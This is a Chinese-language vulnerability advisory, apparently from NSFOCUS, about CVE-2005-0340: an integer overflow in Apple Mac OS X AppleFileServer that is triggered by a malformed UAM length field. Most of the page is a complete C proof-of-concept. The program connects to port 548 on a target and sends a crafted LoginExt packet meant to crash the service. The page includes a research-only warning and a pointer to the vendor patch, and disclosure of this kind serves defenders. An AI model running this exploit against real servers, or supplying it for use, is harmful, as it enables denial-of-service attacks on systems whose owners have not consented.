首页 -> 安全研究
安全研究
安全漏洞
Apple Mac OS X AppleFileServer远程整数溢出漏洞
发布日期:2005-02-06
更新日期:2005-02-06
受影响系统:
Apple MacOS X Server <= 10.3.8描述:
BUGTRAQ ID: 12478
CVE(CAN) ID: CVE-2005-0340
AppleFileServer是MacOS X系统使用的Apple文件服务程序。
AppleFileServer在处理包含畸形UAM参数的'LoginExt'报文时存在问题,远程攻击者可以利用此漏洞执行缓冲区溢出攻击,可能导致服务崩溃产生拒绝服务。
问题在于AppleFileServer采用有符号类型的方式处理UAM参数的长度字段,当此字段长度值被设置为0xff之间的数值时,在其后的缓冲区长度计算时会出现整数溢出,用户数据可能溢出分配的缓冲区,导致拒绝服务。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* -( nemo @ felinemenace.org )- 2005
*
* Code for afp bug found by Braden Thomas.
*
* Again hello to everyone @ irc.pulltheplug.org
*
* need a challenge? -( http://pulltheplug.org )-
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#define UAMSIZE 1022
#define AFPVERSIZE 5
#define PATHSIZE 30
#define UASIZE 30
#define AFPNSIZE 5
#define AFPPORT 548
#define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd)
typedef struct { char AFPVER[AFPVERSIZE] ;} AFPVER_T;
typedef struct { char UAM[UAMSIZE] ;} UAM_T;
typedef struct { char PATH[PATHSIZE] ;} PATH_T;
typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t;
typedef struct { char AFPName[AFPNSIZE] ;} AFPName_t;
typedef struct dsi { // Data Stream Interface.
u_int8_t req;
u_int8_t com;
u_int16_t id;
u_int32_t offset;
u_int32_t len;
u_int32_t reserved;
} DSI_T;
typedef struct FPLoginExt { // Establishes a session with a server using an Open Directory domain.
u_int8_t command;
u_int8_t pad;
u_int16_t flags;
AFPVER_T AFPVER;
UAM_T UAM;
u_int8_t UserNameType;
AFPName_t UserName;
u_int8_t PathType;
PATH_T Pathname;
u_int8_t pad2;
UserAuth_t UserAuthInfo;
} FP_LoginExt_T;
DSI_T dsi;
FP_LoginExt_T fploginext;
void banner()
{
printf(" [ fm-afp.c ]\n");
printf("-( nemo@felinemenace.org )-\n\n");
}
void usage(char *progname)
{
printf("usage: %s <ip address>.\n",progname);
exit(1);
}
int connect_afp(char *ip,int *sockfd)
{
struct sockaddr_in target_addr;
int len;
*sockfd = socket(AF_INET, SOCK_STREAM, 0);
target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(AFPPORT);
inet_aton(ip, &(target_addr.sin_addr));
memset(&(target_addr.sin_zero), '\0', 8);
if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) {
return 1;
}
return 0;
}
void generate_packet(char *packet)
{
int n;
dsi.req = '\x00';
dsi.com = '\x02';
dsi.id = (u_int16_t)0x0002;
dsi.offset = 0x00000000;
dsi.len = 0x00000434;
dsi.reserved = 0x00000000;
fploginext.command = (u_int8_t)'\x3f';
fploginext.pad = (u_int8_t)'\x00';
fploginext.flags = (u_int16_t)0x0000;
memcpy((char *)&(fploginext.AFPVER),"\x04\x6e\x65\x6d\x6f",5);
memset((char*)((&fploginext.UAM)),'\x70',sizeof(fploginext.UAM));
fploginext.UAM.UAM[0] = '\x0f';
fploginext.UAM.UAM[1] = '\xff';
fploginext.UAM.UAM[257] = '\xff'; // size of nextstring.
fploginext.UAM.UAM[258] = '\xff'; //
fploginext.UAM.UAM[500] = '\x00'; // size of next string.
fploginext.UAM.UAM[501] = '\xf0'; //
fploginext.UserNameType = (u_int8_t)'\x11';
memcpy((char *)&(fploginext.UserName),"\x54\x6e\x65\x6d\x6f",5);
fploginext.PathType = (u_int8_t)'\xff';
memcpy((char*)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30);
fploginext.pad2 = (u_int8_t)'\xff';
memcpy((char*)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30);
memcpy(packet, &dsi, sizeof(dsi));
packet += sizeof(dsi);
memcpy(packet, &fploginext, sizeof(fploginext));
}
int send_packet(char *packet,int *sockfd)
{
if (send(*sockfd, packet, BUFSIZE, 0) == -1) {
return 1;
}
return 0;
}
int main(int ac, char **av)
{
int sockfd;
char packet[BUFSIZE];
struct timeval time;
fd_set mySet;
banner();
if(ac != 2) {
usage(*av);
}
printf("[+] Connecting to target: %s.\n",av[1]);
if(connect_afp(av[1],&sockfd)) {
printf("[-] An error has occured connecting to the target.\n");
exit(1);
}
printf("[+] Generating malicious packet.\n");
generate_packet(packet);
printf("[+] Sending packet to target.\n");
if(send_packet(packet,&sockfd)) {
printf("[-] Error sending packet.\n");
close(sockfd);
exit(1);
}
FD_ZERO(&mySet);
FD_SET(sockfd, &mySet);
time.tv_sec = 0;
time.tv_usec = 50;
select(sockfd+1, &mySet, NULL, NULL, &time);
close(sockfd);
return 0;
}
建议:
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.apple.com
浏览次数:2932
严重程度:0(网友投票)
绿盟科技给您安全的保障